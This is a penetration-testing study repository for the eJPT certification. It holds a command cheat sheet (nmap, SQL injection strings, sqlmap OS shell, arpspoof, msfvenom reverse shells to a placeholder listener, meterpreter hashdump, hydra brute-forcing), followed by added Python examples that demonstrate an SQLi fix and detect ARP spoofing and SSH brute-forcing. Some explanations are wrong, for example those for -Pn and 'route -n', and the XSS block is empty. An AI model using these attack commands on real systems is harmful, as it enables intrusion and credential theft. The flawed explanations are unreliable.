```
├── README.md
├── condensed_notes
│   └── README.md
└── images
    └── obfuscated_cert.png
```

/README.md:
--------------------------------------------------------------------------------

# eJPT Notes

![eJPT Certification](images/obfuscated_cert.png)

## Introduction

This repository holds my notes for the eLearnSecurity Junior Penetration Tester certification. While I would recommend you use these notes, I would also encourage you to make your own as you go through the INE [Penetration Testing Student](https://my.ine.com/CyberSecurity/learning-paths/a223968e-3a74-45ed-884d-2d16760b8bbd/penetration-testing-student) course.

For effective notetaking, I would highly recommend [Obsidian](https://obsidian.md/). I have only started using it recently and it has completely changed the way I write notes and massively increased my productivity.

The notes that follow do not contain details about the labs or the exam for obvious reasons. Also note that INE update their courses frequently, so some of this information may be outdated. I will do my best to update it, but I'm not planning on doing a complete overhaul should the course change significantly.

**Date last updated**: 6th January 2021

## Condensed Notes

Click [here](condensed_notes/README.md) for quick cheatsheet-style notes.

## Final Comments

I am very much a "quality over quantity" person, so the content I produce takes a long time for me to create.
If you like this or found it useful, buy me a coffee:

Buy Me A Coffee

If you want to keep up to date on what I do, follow me here:

- [Twitter](https://twitter.com/0xV3R4X)
- [GitHub](https://github.com/0xv3r4x)

--------------------------------------------------------------------------------
/condensed_notes/README.md:
--------------------------------------------------------------------------------

# eJPT Condensed Notes

These are my condensed notes to help you on the eJPT exam. The layout of this document follows a logical order from enumeration to exploitation. Repeat steps where necessary.

## Common Ports

### TCP

| **Port** | **Service** |
| -------- | ----------- |
| 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP |
| 53 | DNS |
| 80 | HTTP |
| 110 | POP3 |
| 139 + 445 | SMB |
| 143 | IMAP |
| 443 | HTTPS |

### UDP

| **Port** | **Service** |
| -------- | ----------- |
| 53 | DNS |
| 67 | DHCP |
| 68 | DHCP |
| 69 | TFTP |
| 161 | SNMP |

### Other Useful Ports

| **Port** | **Service** |
| -------- | ----------- |
| 1433 | MS SQL Server |
| 3389 | RDP |
| 3306 | MySQL |

## Scanning and Enumeration

### Establish your IP with `ifconfig`

Use `ifconfig` to establish your IP.
For example:

```console
$ ifconfig
tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.193.70  netmask 255.255.255.0  broadcast 0.0.0.0
        inet6 fe80::c8f:29ff:feb4:5219  prefixlen 64  scopeid 0x20<link>
        ether 0e:8f:29:b4:52:19  txqueuelen 1000  (Ethernet)
        RX packets 14  bytes 1541 (1.5 KiB)
        RX errors 0  dropped 4  overruns 0  frame 0
        TX packets 9  bytes 754 (754.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
```

### Ping Sweeps using `fping`

```console
$ fping -a -g IPRANGE
```

- `-a` only shows **alive hosts**
- `-g` performs a **ping sweep** instead of a normal ping

For example:

```console
$ fping -a -g 192.168.32.0/24

OR

$ fping -a -g 192.168.82.0 192.168.82.255
```

You can also suppress warnings by redirecting the process's standard error to `/dev/null`:

```console
$ fping -a -g 192.168.32.0/24 2>/dev/null

OR

$ fping -a -g 192.168.82.0 192.168.82.255 2>/dev/null
```

### Combining `fping` with `nmap`

Use `fping` to discover hosts and direct the output to a file `ips.txt`:

```console
$ fping -a -g IPRANGE 2>/dev/null > ips.txt
```

Then, use `nmap` to conduct a ping scan of those hosts:

```console
$ nmap -sn -iL ips.txt
```

### Host Discovery with `nmap`

Perform a ping scan using `-sn`:

```console
$ nmap -sn IPRANGE
```

For example:

```console
$ nmap -sn 200.200.0.0/16
$ nmap -sn 200.200.123.1-12
$ nmap -sn 172.16.12.*
$ nmap -sn 200.200.12-13.*
```

You can also load targets from an input list using `-iL`:

```console
$ nmap -sn -iL FILENAME.EXTENSION
```

For example, a file named `hostlist.txt` contains the following:

```console
192.168.32.0/24
172.16.12.*
200.200.123.1-12
```

The `nmap` command would then become:

```console
$ nmap -sn -iL hostlist.txt
```

### Enumeration with `nmap`

For each host on a network, you can run the following to enumerate it:

```console
$ nmap -p- -Pn -sC -sV IP
```

- `-p-` scans all ports
- `-Pn` assumes all ports are open
- `-sC` performs a **script scan**
- `-sV` performs a **version detection scan**

For example:

```console
# Full port enumeration, output to a file
$ nmap -p- -Pn -sC -sV 192.168.1.24 -oN initial_scan

# First 1000 ports
$ nmap -p 1-1000 192.168.1.24

# Service detection scan on a /24 network
$ nmap -sV 10.11.12.0/24

# TCP connect scan on two targets
$ nmap -sT 192.168.12.33,34

# Full scan (all ports, SYN/script/version scan)
$ nmap -Pn -T4 --open -sS -sC -sV --min-rate 1000 --max-retries 3 -p- -oN output_file 10.10.10.2
```

### Shares Enumeration

#### Using `smbclient`

List shares:

```console
$ smbclient -L //IP/ -N
```

Mount share:

```console
$ smbclient //IP/SHARE
```

#### Using `enum4linux`

```console
$ enum4linux -a IP
```

#### Using `nmblookup`

```console
$ nmblookup -A IP
```

#### Using `nmap`

```console
$ nmap --script smb-vuln* -p 139,445 IP
```

### Banner Grabbing

#### Using `netcat`

```console
$ nc -nv IP PORT
```

For example:

```console
$ nc -nv 192.168.1.24 80
```

#### Using `openssl` (HTTPS)

```console
$ openssl s_client -connect IP:443
```

### Common Wireshark Filters

| Description | Syntax | Example |
| ----------- | ------ | ------- |
| Filter by IP | `ip.addr == IP ADDRESS` | `ip.addr == 192.168.1.28` |
| Filter by Destination IP | `ip.dst == IP ADDRESS` | `ip.dst == 192.168.1.28` |
| Filter by Source IP | `ip.src == IP ADDRESS` | `ip.src == 192.168.1.72` |
| Filter by Port | `tcp.port == PORT` | `tcp.port == 80` |
| Filter by IP Address and Port | `ip.addr == IP ADDRESS and tcp.port == PORT` | `ip.addr == 10.9.0.1 and tcp.port == 80` |
| Filter by Request (HTTP/HTTPS) | `http.request.method == METHOD` | `http.request.method == "POST"` or `http.request.method == "GET"` |

### Web Enumeration

#### Directory Fuzzing with `gobuster`

```console
$ gobuster dir -u URL -w WORDLIST
```

For example:

```console
# Directory scan against one target using the medium wordlist
$ gobuster dir -u http://192.168.1.32 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Directory scan against a specific directory using a custom wordlist
$ gobuster dir -u http://192.168.5.24/confidential -w custom_wordlist.txt

# Directory scan with authentication
$ gobuster dir -u http://192.168.4.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -U admin
```

#### Directory Fuzzing with `dirb`

```console
$ dirb URL WORDLIST
```

For example:

```console
# Directory scan against one target
$ dirb http://192.168.1.72/ /usr/share/wordlists/dirb/common.txt

# Directory scan with authentication
$ dirb http://192.168.1.85/ -u "username:password" /usr/share/wordlists/dirb/common.txt
```

#### Enumeration with `nikto`

```console
$ nikto -h URL
```

For example:

```console
$ nikto -h http://192.168.1.10/
```

#### `whois`

```console
$ whois DOMAIN
```

## Routing and Pivoting
### Clear Routing Table

To completely clear the routing table, run the following:

```console
$ route -n
```

Use this when setting up a route to make the destination and gateway clearer.

### Show Routing Table

On Windows (and Linux), you can use `arp -a`:

```console
$ arp -a
```

And, on Linux, you can use `ip route`:

```console
$ ip route
```

### Setting up a Route with `iproute`

```console
$ ip route add NETWORK via GATEWAY
```

For example:

```console
$ ip route add 192.168.1.0/24 via 10.10.22.1
```

This adds a route to the `192.168.1.0/24` network via the `10.10.22.1` router.

## Exploitation

### Web Exploitation

#### Manual SQL Injection (SQLi)

| Description | Injection |
| ----------- | --------- |
| Basic union | `xx' UNION SELECT null; -- -` |
| Basic bypass | `' or 1=1; -- -` |

#### Automated Exploitation with `sqlmap`

```console
$ sqlmap -u URL -p PARAMETER [options]
```

For example:

```console
# Display all tables in the database
$ sqlmap -u 'http://10.10.0.1/index.php?id=47' --tables

# Enumerate the id parameter using the union technique
$ sqlmap -u 'http://192.168.1.72/index.php?id=10' -p id --technique=U

# Dump database contents
$ sqlmap -u 'http://192.162.5.51/index.php?id=203' --dump

# Prompt for an interactive OS shell
$ sqlmap -u 'http://192.168.1.17/index.php?id=1' --os-shell
```

#### Cross-Site Scripting (XSS)

Test inputs against XSS using:

```js

```

### Host Exploitation

#### `arpspoof`

First, tell your machine to forward packets to the destination host:

```console
$ echo 1 > /proc/sys/net/ipv4/ip_forward
```

Then, run `arpspoof`:

```console
$ arpspoof -i INTERFACE -t TARGET -r HOST
```

For example:

```console
$ arpspoof -i tap0 -t 10.10.5.1 -r 10.10.5.7
```

#### Basic Metasploit Usage

Launch Metasploit by running:

```console
$ msfconsole
```

Basic commands:

```console
# Search for an exploit
msf5 > search apache

# Use an exploit (by number)
msf5 > use 1

# Use an exploit (by name)
msf5 > use exploit/multi/handler

# Set a parameter
msf5 > set payload windows/x64/meterpreter/reverse_tcp

# Show parameters and other options
msf5 > show options
```

For example, to configure a listener for a reverse shell:

```console
$ msfconsole
msf5 > use exploit/multi/handler
msf5 > set payload PAYLOAD
msf5 > set LHOST LISTENER_IP
msf5 > set LPORT LISTENER_PORT
msf5 > exploit
```

#### Generate Payload Using `msfvenom`

Standard PHP reverse shell:

```console
$ msfvenom -p php/reverse_php LHOST=LISTENER_IP LPORT=LISTENER_PORT -o FILENAME
```

Windows reverse shell:

```console
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f dll > shell.dll
```

Linux reverse shell:

```console
$ msfvenom -p linux/x64/shell/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f elf > shell.elf
```

#### Meterpreter Shell Commands

```console
# background current session
meterpreter > background

# list current open sessions
meterpreter > sessions -l

# open session
meterpreter > sessions -i ID

# privilege escalation (Windows)
meterpreter > getsystem

# list system information
meterpreter > sysinfo/route/getuid

# dump Windows hashes
meterpreter > hashdump

# download file from system
meterpreter > download /path/to/directory
```

#### Listener with `netcat`

```console
$ nc -nvlp PORT
```

- `-n`: IP addresses only (no DNS)
- `-v`: verbose mode (`-vv` for very verbose)
- `-l`: listen for incoming connections
- `-p`: local port to listen on

For example:

```console
$ nc -nvlp 4444
```

#### Stabilise a Shell

Spawn an interactive terminal via Python:

```console
# First, check whether the system has Python
$ which python
/usr/bin/python

# Then, spawn a shell using pty
$ python -c "import pty; pty.spawn('/bin/bash')"

# Finally, export TERM (allows you to clear the terminal)
$ export TERM=xterm
```

**NOTE**: this works the same with `python3`.

## Bruteforcing

### `hydra`

```console
$ hydra -L USERS -P PASSWORDS IP SERVICE -s PORT

OR

$ hydra -l USER -P PASSWORDS -t THREADS IP SERVICE -s PORT
```

```console
# Bruteforce SSH
$ hydra -L users.txt -P pass.txt 10.10.10.2 ssh -s 22
$ hydra -L users.txt -P pass.txt ssh://10.10.10.2

# Bruteforce FTP
$ hydra -l admin -P passwords.txt 192.168.1.4 ftp -s 21
$ hydra -l admin -P passwords.txt ftp://192.168.1.4
```

### John The Ripper (`john`)

First, prepare a file for `john` to crack:

```console
$ unshadow passwd shadow > hash
```

Crack the passwords:

```console
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

## Other cheatsheets:

- Hydra: https://github.com/frizb/Hydra-Cheatsheet
- GTFOBins: https://gtfobins.github.io/
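The two strings in the Manual SQL Injection table above only work because the application splices user input into the query text. The Python below is an added example, not part of the original notes: it builds a constructed in-memory SQLite `users` table (the table, user and password are made up for the demo) and runs both injection strings against a string-concatenated query and against a parameterised one, so you can see exactly what the fix changes.

```python
import sqlite3

# Constructed in-memory stand-in for a web application's user table (demo data only).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")
    return con

def login_vulnerable(con, username, password):
    # Input is spliced into the SQL text, so quotes and comments in it become SQL grammar.
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(query)]

def login_hardened(con, username, password):
    # Bound parameters reach the engine as data and can never alter the statement.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(query, (username, password))]

# The two injection strings from the Manual SQL Injection table.
BASIC_BYPASS = "' or 1=1; -- -"
BASIC_UNION = "xx' UNION SELECT null; -- -"

def demo():
    con = make_db()
    return {
        # the comment (-- -) swallows the password check and 1=1 matches every row
        "vulnerable_bypass": login_vulnerable(con, BASIC_BYPASS, "wrong"),
        # the UNION appends an attacker-controlled row, confirming the column count
        "vulnerable_union": login_vulnerable(con, BASIC_UNION, "wrong"),
        # the same strings against the parameterised query are just unknown usernames
        "hardened_bypass": login_hardened(con, BASIC_BYPASS, "wrong"),
        "hardened_union": login_hardened(con, BASIC_UNION, "wrong"),
        # real credentials still work after the fix
        "hardened_valid": login_hardened(con, "alice", "S3cret!"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:18s} -> {rows}")
```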
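Seen from the network, the `arpspoof -i tap0 -t 10.10.5.1 -r 10.10.5.7` run in the Host Exploitation section shows up as one MAC suddenly answering ARP for both 10.10.5.1 and 10.10.5.7. The Python below is an added example, not part of the original notes: it keeps the first IP-to-MAC binding seen and alerts when a later ARP reply contradicts it, and also lists any MAC claiming more than one IP. The reply records are constructed; the spoofing MAC reuses the tap0 address from the `ifconfig` output above purely as an illustration, and the other MACs are made up.

```python
from collections import defaultdict

# Constructed ARP reply observations (sender IP, sender MAC, seconds) as a passive sniffer
# on the 10.10.5.0/24 segment might record them. SPOOFER_MAC is the tap0 MAC from the
# ifconfig output above, reused here as the host running arpspoof; the others are made up.
GATEWAY_MAC = "0a:11:22:33:44:01"
VICTIM_MAC = "0a:11:22:33:44:07"
SPOOFER_MAC = "0e:8f:29:b4:52:19"

SAMPLE_ARP_REPLIES = [
    ("10.10.5.1", GATEWAY_MAC, 1.0),   # normal: the gateway answers for itself
    ("10.10.5.7", VICTIM_MAC, 1.5),    # normal: the host answers for itself
    ("10.10.5.1", GATEWAY_MAC, 2.0),
    ("10.10.5.1", SPOOFER_MAC, 3.0),   # arpspoof -t 10.10.5.1 -r 10.10.5.7 starts here
    ("10.10.5.7", SPOOFER_MAC, 3.1),
    ("10.10.5.1", SPOOFER_MAC, 5.0),   # arpspoof keeps re-sending to keep caches poisoned
]

def detect_arp_spoofing(replies):
    """Return (alerts, duplicates): alerts for IPs whose MAC changed, MACs claiming several IPs."""
    known = {}                   # IP -> MAC first seen answering for it
    claimed = defaultdict(set)   # MAC -> every IP it has answered for
    alerts = []
    for ip, mac, when in replies:
        claimed[mac].add(ip)
        if ip in known and known[ip] != mac:
            alerts.append({"time": when, "ip": ip, "expected": known[ip], "seen": mac})
        else:
            known.setdefault(ip, mac)
    duplicates = {mac: sorted(ips) for mac, ips in claimed.items() if len(ips) > 1}
    return alerts, duplicates

if __name__ == "__main__":
    found, dups = detect_arp_spoofing(SAMPLE_ARP_REPLIES)
    for a in found:
        print(f"t={a['time']}: {a['ip']} moved from {a['expected']} to {a['seen']}")
    print("MACs answering for more than one IP:", dups)
```

Static ARP entries for the gateway on sensitive hosts, or dynamic ARP inspection on the switch, stop the poisoned replies being accepted in the first place; this detector only tells you it is happening.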
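The `hydra` SSH runs in the Bruteforcing section leave a distinctive trail in the target's auth log: many `Failed password` lines from one source in a few seconds, often cycling through usernames. The Python below is an added example, not part of the original notes: it parses a few constructed OpenSSH log lines (hostnames, IPs and timestamps are made up) and flags any source address with five or more failures inside a sixty-second window, listing the usernames it tried.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log lines in the format OpenSSH uses for failed logins (demo data only).
SAMPLE_LOG = """\
Jan  6 10:00:01 target sshd[1201]: Failed password for invalid user admin from 10.10.10.5 port 51234 ssh2
Jan  6 10:00:02 target sshd[1203]: Failed password for invalid user root from 10.10.10.5 port 51235 ssh2
Jan  6 10:00:02 target sshd[1205]: Failed password for invalid user test from 10.10.10.5 port 51236 ssh2
Jan  6 10:00:03 target sshd[1207]: Failed password for bob from 10.10.10.5 port 51237 ssh2
Jan  6 10:00:04 target sshd[1209]: Failed password for bob from 10.10.10.5 port 51238 ssh2
Jan  6 10:00:05 target sshd[1211]: Accepted password for bob from 10.10.10.5 port 51239 ssh2
Jan  6 10:05:00 target sshd[1300]: Failed password for carol from 192.168.1.9 port 40000 ssh2
Jan  6 10:20:00 target sshd[1400]: Failed password for carol from 192.168.1.9 port 40001 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def parse_ts(ts, year=2021):
    # Syslog timestamps carry no year; assume one so they can be compared.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: {failures, users}} for every source that exceeds the threshold in one window."""
    failures = defaultdict(list)              # source IP -> [(time, username)]
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
    alerts = {}
    for ip, hits in failures.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):    # slide a window starting at each failure
            burst = [u for t, u in hits[i:] if (t - start).total_seconds() <= window_seconds]
            if len(burst) >= threshold:
                alerts[ip] = {"failures": len(burst), "users": sorted(set(burst))}
                break
    return alerts

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The single `Accepted password` after a burst of failures from the same address is the line worth paging on; rate-limiting sshd with fail2ban or key-only authentication removes the attack surface this detector watches.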